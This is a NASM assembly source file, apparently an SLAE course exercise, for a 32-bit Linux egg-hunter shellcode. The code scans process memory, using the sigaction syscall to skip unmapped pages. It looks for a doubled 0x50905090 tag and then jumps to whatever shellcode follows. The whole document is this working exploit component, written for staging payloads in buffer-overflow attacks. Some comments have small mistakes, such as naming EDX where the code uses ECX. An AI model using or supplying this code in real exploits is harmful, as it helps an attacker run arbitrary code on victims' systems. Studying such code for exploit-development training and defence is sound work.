; Filename: egg_hunter_shellcode.nasm; Author: Kunal Pachauri; SLAE-9237glob

1. ; Filename: egg_hunter_shellcode.nasm
2. ; Author: Kunal Pachauri
3. ; SLAE-9237
4.  
5. global _start ; Making the Entry point accessible
6.  
7. section .text
8. _start: ; Entry Point
9.  
10. xor ecx, ecx ; Zeroing out EDX, will use the value in register as the address to be validated
11.  
12. page_align:
13.  
14. or cx, 0xfff ; Result in setting lower 16 bytes of EDX i.e 4095
15.  
16. next_address:
17.  
18. inc ecx ; Increment EDX (4095+1 i.e Increasing by Page size)
19. push 0x43 ; SYSCALL Number for sigaction i.e 67
20. pop eax ; Loading syscall in EAX
21. int 0x80 ; Performing Interrupt
22.  
23. check_efault:
24.  
25. cmp al, 0xf2 ; 0xf2 represents return value as EFAULT, checking against it
26. jz page_align ; If we get EFAULT, then we need to increase the page number i.e increasing address by 4096
27. ; Else, we need to continue and check for the presence of EGG on that memory address
28. check_egg:
29.  
30. mov eax, 0x50905090 ; Loading our Egg Tag to compare -> nop,push eax combination
31. mov edi, ecx ; Since scasd compares the string in EAX and EDI, moving the validated address in EDI
32. scasd ; Compares the string, If equal then sets Zero Flag
33. jnz next_address ; If Egg is not found, increement the address and repeat the above steps
34. scasd ; If Egg is matched, check next four bytes are also Egg to make sure it is not finding the egg tag itself
35. jnz next_address ; If Egg is not found, it was the tag itself, increment address and repeat
36. jmp edi ; Egg is found, redirect execution to shellcode